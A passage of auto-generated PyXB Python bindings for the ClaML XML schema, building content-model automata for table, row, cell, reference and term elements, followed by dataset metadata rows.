fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_29._Automaton = _BuildAutomaton_20()
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Caption'), CTD_ANON_31, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 328, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'THead'), CTD_ANON_32, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 334, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TBody'), CTD_ANON_33, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 342, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), CTD_ANON_34, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 350, 4)))
def _BuildAutomaton_21 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_21
del _BuildAutomaton_21
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 320, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 321, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 322, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 323, 16))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Caption')), pyxb.utils.utility.Location('ClaML.xsd', 320, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'THead')), pyxb.utils.utility.Location('ClaML.xsd', 321, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TBody')), pyxb.utils.utility.Location('ClaML.xsd', 322, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TFoot')), pyxb.utils.utility.Location('ClaML.xsd', 323, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_30._Automaton = _BuildAutomaton_21()
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_22 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_22
del _BuildAutomaton_22
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 330, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_31._Automaton = _BuildAutomaton_22()
CTD_ANON_32._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_32, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_23 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_23
del _BuildAutomaton_23
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 337, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_32._Automaton = _BuildAutomaton_23()
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_24 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_24
del _BuildAutomaton_24
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 345, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_33._Automaton = _BuildAutomaton_24()
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_25 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_25
del _BuildAutomaton_25
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 353, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_34._Automaton = _BuildAutomaton_25()
CTD_ANON_35._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Cell'), CTD_ANON_36, scope=CTD_ANON_35, location=pyxb.utils.utility.Location('ClaML.xsd', 366, 4)))
def _BuildAutomaton_26 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_26
del _BuildAutomaton_26
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 361, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Cell')), pyxb.utils.utility.Location('ClaML.xsd', 361, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_35._Automaton = _BuildAutomaton_26()
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_27 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_27
del _BuildAutomaton_27
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 368, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 370, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 371, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 372, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 373, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_36._Automaton = _BuildAutomaton_27()
def _BuildAutomaton_28 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_28
del _BuildAutomaton_28
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_37._Automaton = _BuildAutomaton_28()
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4)))
def _BuildAutomaton_29 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_29
del _BuildAutomaton_29
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 117, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Display')), pyxb.utils.utility.Location('ClaML.xsd', 117, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_38._Automaton = _BuildAutomaton_29()
CTD_ANON_39._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_39._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), CTD_ANON_18, scope=CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 211, 4)))
def _BuildAutomaton_30 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_30
del _BuildAutomaton_30
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 189, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 190, 16))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_39._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 189, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_39._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass')), pyxb.utils.utility.Location('ClaML.xsd', 190, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_39._Automaton = _BuildAutomaton_30()
CTD_ANON_40._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_40._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_31 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_31
del _BuildAutomaton_31
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 272, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_40._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_40._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_40._Automaton = _BuildAutomaton_31()
| 48.147095
| 261
| 0.740597
| 23,847
| 194,755
| 5.770915
| 0.023986
| 0.032299
| 0.058015
| 0.0865
| 0.8971
| 0.886978
| 0.877502
| 0.87089
| 0.835931
| 0.785429
| 0
| 0.027879
| 0.136022
| 194,755
| 4,044
| 262
| 48.159001
| 0.789997
| 0.086632
| 0
| 0.652112
| 1
| 0
| 0.078036
| 0.031283
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012169
| false
| 0
| 0.01539
| 0
| 0.267001
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df65c716b41d51b49b50cf34ea3d10e60c5c0e4a
| 11,107
|
py
|
Python
|
src/prefect/tasks/sql_server/sql_server.py
|
nicolasiltis/prefect
|
4298105651c2fe02b21013ae8a0468e9e101154d
|
[
"Apache-2.0"
] | 8,633
|
2019-03-23T17:51:03.000Z
|
2022-03-31T22:17:42.000Z
|
src/prefect/tasks/sql_server/sql_server.py
|
